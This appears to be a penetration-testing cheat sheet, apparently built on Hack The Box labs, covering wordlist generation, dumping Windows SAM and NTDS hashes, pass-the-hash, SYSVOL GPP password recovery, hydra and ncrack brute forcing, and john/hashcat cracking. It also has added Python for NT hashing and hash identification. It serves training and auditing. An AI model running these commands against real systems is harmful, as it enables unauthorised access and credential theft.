1 Preparing for brute force
Identify hash
hash-identifier
crunch
| create 6-character passwords over the hex digits 0-9 and A-F (112MB)
root@kali: crunch 6 6 0123456789ABCDEF -o list.txt
| create something more common using CHARACTER SETS (34 MB)
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha -o mixedalpha.txt
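The two sizes quoted above come from the keyspace and the newline crunch writes after each candidate. The following is an added example (not part of the original notes) that estimates candidate count and file size for a crunch invocation before generating it, and the worst-case time to exhaust that keyspace at an assumed hash rate:

```python
# Added example, not from the original notes: size a crunch keyspace before writing it to disk.

def crunch_estimate(min_len, max_len, charset_size):
    """Return (candidate_count, file_bytes) for `crunch <min_len> <max_len> <charset>`.
    crunch writes one candidate per line, so a candidate of length n costs n+1 bytes."""
    lengths = range(min_len, max_len + 1)
    count = sum(charset_size ** n for n in lengths)
    size = sum(charset_size ** n * (n + 1) for n in lengths)
    return count, size


def exhaust_seconds(candidates, hashes_per_second):
    """Worst-case seconds to try every candidate at a constant rate (the rate is an assumption)."""
    return candidates / hashes_per_second


def human_size(n_bytes):
    """Binary-prefixed size string, e.g. 117440512 -> '112.0 MB'."""
    for unit in ("B", "KB", "MB", "GB", "TB"):
        if n_bytes < 1024 or unit == "TB":
            return f"{n_bytes:.1f} {unit}"
        n_bytes /= 1024


if __name__ == "__main__":
    # crunch 6 6 0123456789ABCDEF -o list.txt : 16 symbols, fixed length 6
    count, size = crunch_estimate(6, 6, 16)
    print(count, "candidates,", human_size(size))        # 16777216 candidates, 112.0 MB
    # crunch 4 4 -f charset.lst mixalpha : 52 symbols (a-z, A-Z), fixed length 4
    count, size = crunch_estimate(4, 4, 52)
    print(count, "candidates,", human_size(size))        # 7311616 candidates, 34.9 MB
    # Assumed rate of 1e9 NT hashes/s for illustration only; substitute a measured figure.
    print(f"{exhaust_seconds(16777216, 1e9):.3f} s to exhaust the 6-hex-digit keyspace")
```

Both figures match the notes (112 MB and roughly 34 MB); the `n+1` term is what makes a 16^6 list 112 MB rather than 96 MB.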
cewl
| we can use words and phrases from the company's website to generate a list.
root@kali: cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt
| create a custom dictionary
- we use john to mutate the words we downloaded.
root@kali: vim /etc/john/john.conf
root@kali: john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt
2 WINDOWS DUMP
SAM
The Security Account Manager (SAM) is a database file in Windows XP, Windows Vista, Windows 7, 8.1 and 10 that stores users' passwords.
location:
/windows/system32/config/SAM
The user passwords are stored in a hashed format in a registry hive, either as an LM hash or as an NTLM hash.
LM NTLM NET-NTLMv2 hashes
NTLM:
NTLM hashes are stored in the Security Account Manager (SAM) database and in the Domain Controller's NTDS.dit database.
- form 1
aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 (lmhash:ntlmhash)
- form 2
Administrator:500:aad3b435b51404eeaad3b435b51404ee:214e90b41e2752d80acd34e13f3e9831::: (username:userid:lmhash:ntlmhash:::)
The LM hash is the one before the colon (:) and the NT hash is the one after the colon. Starting with Windows Vista and Windows Server 2008, by default, only the NT hash is stored.
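As an added example (not part of the original notes), the block below computes an NT hash the way Windows does (MD4 over the UTF-16LE password, no salt) with a self-contained MD4, then parses pwdump-style `user:rid:lmhash:nthash:::` lines and flags the two things an audit of such a dump looks for: an NT field equal to the hash of the empty string (empty password, or a disabled built-in account such as Guest) and an LM field that is not the "no LM hash stored" value. The sample lines are the ones from the pwdump output later in these notes; everything else is constructed for the example.

```python
# Added example, not from the original notes: NT hash computation and pwdump-line audit.
import re
import struct

MASK = 0xFFFFFFFF


def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def _md4_round(fn, const, order, shifts, X, state):
    # One MD4 round of 16 steps; rotating the 4-tuple after each step reproduces
    # the (a,b,c,d) -> (d,a,b,c) -> (c,d,a,b) -> (b,c,d,a) register pattern of RFC 1320.
    a, b, c, d = state
    for i, k in enumerate(order):
        a = _lrot((a + fn(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
        a, b, c, d = d, a, b, c
    return a, b, c, d


def md4(data: bytes) -> bytes:
    """MD4 (RFC 1320), written out because hashlib's md4 is missing on many modern OpenSSL builds."""
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    state = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = _md4_round(F, 0, range(16), (3, 7, 11, 19), X, state)
        s = _md4_round(G, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15),
                       (3, 5, 9, 13), X, s)
        s = _md4_round(H, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15),
                       (3, 9, 11, 15), X, s)
        state = tuple((x + y) & MASK for x, y in zip(state, s))
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)); unsalted, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()


EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": the field value when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of "": the account has an empty password
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_pwdump(line: str) -> dict:
    """Split a pwdump/hashdump line into its fields and derive the two audit flags."""
    m = PWDUMP_RE.match(line.strip())
    if not m:
        raise ValueError(f"not a pwdump line: {line!r}")
    user, rid, lm, nt = m.groups()
    lm, nt = lm.lower(), nt.lower()
    return {"user": user, "rid": int(rid), "lm": lm, "nt": nt,
            "lm_stored": lm != EMPTY_LM, "empty_password": nt == EMPTY_NT}


def audit(lines):
    """(user, reason) pairs for accounts with an empty password or a legacy LM hash present."""
    findings = []
    for rec in (parse_pwdump(ln) for ln in lines if ln.strip()):
        if rec["empty_password"]:
            findings.append((rec["user"], "empty password or disabled account (NT hash of empty string)"))
        if rec["lm_stored"]:
            findings.append((rec["user"], "LM hash stored (legacy, trivially crackable)"))
    return findings


# Sample dump lines taken from the pwdump output in these notes.
SAMPLE = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
""".splitlines()

if __name__ == "__main__":
    print("NT('') =", nt_hash(""))        # 31d6cfe0d16ae931b73c59d7e0c089c0
    for user, reason in audit(SAMPLE):
        print(f"{user}: {reason}")
```

Because the NT hash is unsalted MD4, `nt_hash("")` reproduces the `31d6cfe0...` value seen in the Administrator and Guest lines, which is why those two accounts are flagged while `L4mpje` is not.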
Net-NTLMv1/v2
Net-NTLM hashes are used for network authentication (they are derived from a challenge/response algorithm and are based on the user’s NT hash). Here is an example of a Net-NTLMv2 (a.k.a NTLMv2) hash:
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
volatility
To retrieve a user's password hashes from a memory dump you need to know the OS (the volatility profile).
| 1. check profile type of the memory dump (ex: Win7SP1x86):
volatility imageinfo -f memorydumpfilename.raw
| 2. get the hive list so we can get the starting location in memory of where the registry information resides:
volatility hivelist -f memdumpfilename.raw --profile=Win7SP1x86
0x9aad6148 0x131af148 \SystemRoot\System32\Config\SAM
0x8b21c008 0x039ef008 \REGISTRY\MACHINE\SYSTEM
SAM = 0x9aad6148, SYSTEM = 0x8b21c008 (virtual offsets, passed to -s and -y below)
| 3. dump the hashes
volatility -f memorydumpfilename.dmp --profile=Win7SP1x86 hashdump -y 0x8b21c008 -s 0x9aad6148 > hashes.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
| 4. pass the hash
with pth-winexe:
root@kali: pth-winexe -U administrator%hash //192.168.31.233 cmd
with psexec.py:
psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 cmd.exe
pwdump and fgdump
- pwdump.exe can be used to dump local SAM hashes from memory. Unlike fgdump it does not try to disable antivirus, so that needs to be dealt with before running the program.
pwdump.exe (host)
- fgdump.exe can be used to dump local SAM hashes from memory. The program uses the IPC$ share to connect and additionally attempts to disable antivirus that may be running on the host.
fgdump.exe, then "type 127.0.0.1.pwdump"
pwdump: dump hashes from the SAM
root@kali:/mnt/vhd/Windows/System32/config: pwdump SYSTEM SAM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
WCE windows credential editor
wce32.exe (wce64.exe) can be used to recover user credentials from memory on Windows XP, Vista, 2003, 7 and 2008; wce can also be used to pass the hash. You need local administrator privileges to run WCE and be able to steal NTLM credentials from memory. This is a post-exploitation tool.
c:\user> wce64.exe -w
c:\user> wce32.exe -w
passing the hash
an NTLM hash can be used in place of a cleartext password
root@kali: vim hashes.txt
we replace the "no password" entry with something else and then export that hash
root@kali: export SMBHASH=saras...asdas
root@kali: pth-winexe -U administrator%hash //192.168.31.233 cmd
psexec.py -hashes :32693b11e6aa90eb43d32c72a07ceea6 htb/administrator@10.10.10.161 cmd.exe
ex:
pth-winexe -U jeeves/Administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 //10.10.10.63 cmd
You CAN perform Pass-The-Hash attacks with NTLM hashes. You CANNOT perform Pass-The-Hash attacks with Net-NTLM hashes. You CAN attack Net-NTLMv2 with responder via LLMNR poisoning.
3 Active Directory
Misconfigured AD
net use z: \\(target_hostname)\SYSVOL
dir /s Groups.xml
type Z:\local.domain\Policies\{84583021-C460-486C-83E1-FA1EC8CA84FC}\Machine\Preferences\Groups\Groups.xml
gpp-decrypt SvtusBQWJgAFrFPTyPH9clizXPQBDqDDGzlSDxKogcz (the password is printed)
AD password audit
The psexec_ntdsgrab module will be used to create Volume Shadow Copies of the ntds.dit and SYSTEM hive and grab them from the domain controller. It requires domain administrator credentials.
it creates two files, one .dit and one .bin
extract hashes
./impacket/examples/secretsdump.py -ntds /home/lab/.msf4/loot/[blah]_psexec.ntdsgrab._104930.dit -system /home/lab/.msf4/loot/[blah]_psexec.ntdsgrab._438132.bin -hashes lmhash:nthash LOCAL -outputfile ntlm_hashes
4 Online password attacks
to try to log in to HTTP, SSH, FTP, etc., several requests have to be sent to the server
tools: medusa, hydra, ncrack
medusa
root@kali: medusa -h 192.168.31.219 -u admin -P password-file.txt -M http -m DIR:/admin -T 20
crowbar (rdesktop)
for example for rdesktop
crowbar -b rdp -s 10.11.0.22/32 -u admin -C ~/password-file.txt -n 1
hydra
- ex:
hydra -l (found_name) -P password.lst 192.168.168.168 ssh
hydra -L username_list.txt -P password_list.txt 192.168.168.168 ssh -t 4
options: -l user, -L list of users, -p password, -P list of passwords
- HTTP post form
hydra -L <wordlist> -P <password list> <IP> http-post-form "<file path>:username=^USER^&password=^PASS^&Login=Login:<fail message>"
ncrack
very useful for breaking RDP
root@kali: ncrack -v -f --user administrator -P password-file.txt rdp://192.168.31.233,CL=1
5 Offline password attacks
John the ripper
root@kali:~# john hashes.txt
root@kali:~# john --format=nt windowshashes.txt --wordlist=passwords.txt
root@kali:~# john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256 password_list
ssh keys bruteforce
python /usr/share/john/ssh2john.py matt_rsa > matt.hash
john --wordlist=rockyou.txt ~/.ssh/matt.hash
unshadow
- ex:
unshadow password_file shadow_file > new_password_list
oclhashcat: NTLM SAM hash from pwdump
- assuming:
cat hash-nolimpio.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:214e90b41e2752d80acd34e13f3e9831:::
username : userid : lmhash : ntlmhash
cat hashes.txt
> 214e90b41e2752d80acd34e13f3e9831
- we run:
root@kali:~# hashcat -m 1000 -a 0 --force hashes-bastion/hashes.txt rockyou.txt
md5 hashcat
I put this $1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ into a .txt file and ran the following command: hashcat -m 500 -a 0 --force davidHash '/root/Desktop/rockyou.txt'
online hash crackers
- Hashkiller (Windows/NTLM): https://hashkiller.co.uk/ntlm-decrypter.aspx
- Crackstation (MD5): https://crackstation.net
- Offensive security (MD5): http://cracker.offensive-security.com
cracking NTLM hashes from a SAM dump
| lm
299BD128C1101FD6
john --format=lm hash.txt
hashcat -m 3000 -a 3 hash.txt
| NTHash
B4B9B02E6F09A9BD760F388B67351E2B
john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt
| NTLMv1 (A.K.A. Net-NTLMv1)
u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c
john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt
| NTLMv2 (A.K.A. Net-NTLMv2)
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt
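The list above is really a small structural identification table: each hash type has a recognisable shape, and the shape decides the `john --format` / `hashcat -m` value. The following added example (not part of the original notes, and not hash-identifier's own code) does that identification for the forms in the list plus the md5crypt and raw SHA-256 forms that appear in the notes' hashcat/john commands, using the sample hashes above as constructed test input. Raw MD5 (hashcat mode 0) and raw SHA-256 (mode 1400) are my additions, included because a bare 32-hex string cannot be told apart from an NT hash by shape alone, which is the main limitation of any identifier of this kind:

```python
# Added example, not from the original notes: shape-based hash identification with the
# john --format / hashcat -m mapping used in these notes.
import re

# (name, structural pattern, john --format, hashcat -m)
HASH_FORMS = [
    ("LM", re.compile(r"^[0-9a-f]{16}$", re.I), "lm", 3000),
    ("NT", re.compile(r"^[0-9a-f]{32}$", re.I), "nt", 1000),
    ("raw MD5", re.compile(r"^[0-9a-f]{32}$", re.I), "raw-md5", 0),
    ("raw SHA-256", re.compile(r"^[0-9a-f]{64}$", re.I), "Raw-SHA256", 1400),
    # $1$<salt up to 8 chars>$<22 chars of crypt base64>
    ("md5crypt", re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$"), "md5crypt", 500),
    # user::domain:LM-response(48 hex):NT-response(48 hex):server challenge(16 hex)
    ("Net-NTLMv1", re.compile(r"^[^:]+::[^:]*:[0-9a-f]{48}:[0-9a-f]{48}:[0-9a-f]{16}$", re.I),
     "netntlm", 5500),
    # user::domain:server challenge(16 hex):NTProofStr(32 hex):blob (hex, even length)
    ("Net-NTLMv2", re.compile(r"^[^:]+::[^:]*:[0-9a-f]{16}:[0-9a-f]{32}:(?:[0-9a-f]{2})+$", re.I),
     "netntlmv2", 5600),
]


def identify(hash_str):
    """All (name, john_format, hashcat_mode) candidates whose shape matches; [] if none."""
    s = hash_str.strip()
    return [(name, john, mode) for name, rx, john, mode in HASH_FORMS if rx.match(s)]


def crack_commands(hash_str, hash_file="hash.txt", wordlist="rockyou.txt"):
    """One john and one hashcat dictionary-mode command line per candidate format."""
    return [(name,
             f"john --format={john} --wordlist={wordlist} {hash_file}",
             f"hashcat -m {mode} -a 0 {hash_file} {wordlist}")
            for name, john, mode in identify(hash_str)]


# Sample hashes, copied from the list in these notes.
LM_EXAMPLE = "299BD128C1101FD6"
NT_EXAMPLE = "B4B9B02E6F09A9BD760F388B67351E2B"
NETNTLMV1_EXAMPLE = ("u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:"
                     "9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c")
NETNTLMV2_EXAMPLE = ("admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:"
                     "5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85"
                     "f78d013c31cdb3b92f5d765c783030")

if __name__ == "__main__":
    for sample in (LM_EXAMPLE, NT_EXAMPLE, NETNTLMV1_EXAMPLE, NETNTLMV2_EXAMPLE):
        print(sample[:40], "->", [c[0] for c in identify(sample)] or "unknown")
        for _, john_cmd, hashcat_cmd in crack_commands(sample):
            print("   ", john_cmd)
            print("   ", hashcat_cmd)
```

Two caveats this makes visible: the 16-hex LM form is one half of an LM hash (the LM field of a pwdump line is two such halves concatenated), and a 32-hex string yields both NT and raw MD5 as candidates, so the source of the hash, not its shape, has to settle which mode to use. For a full pwdump line, take the fourth colon-separated field first, as the notes do with `hashes.txt`.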
6 ZIP
fcrackzip
fcrackzip -v -u -D -p "rockyou.txt" /root/hackthebox/node/myplace-backup.zip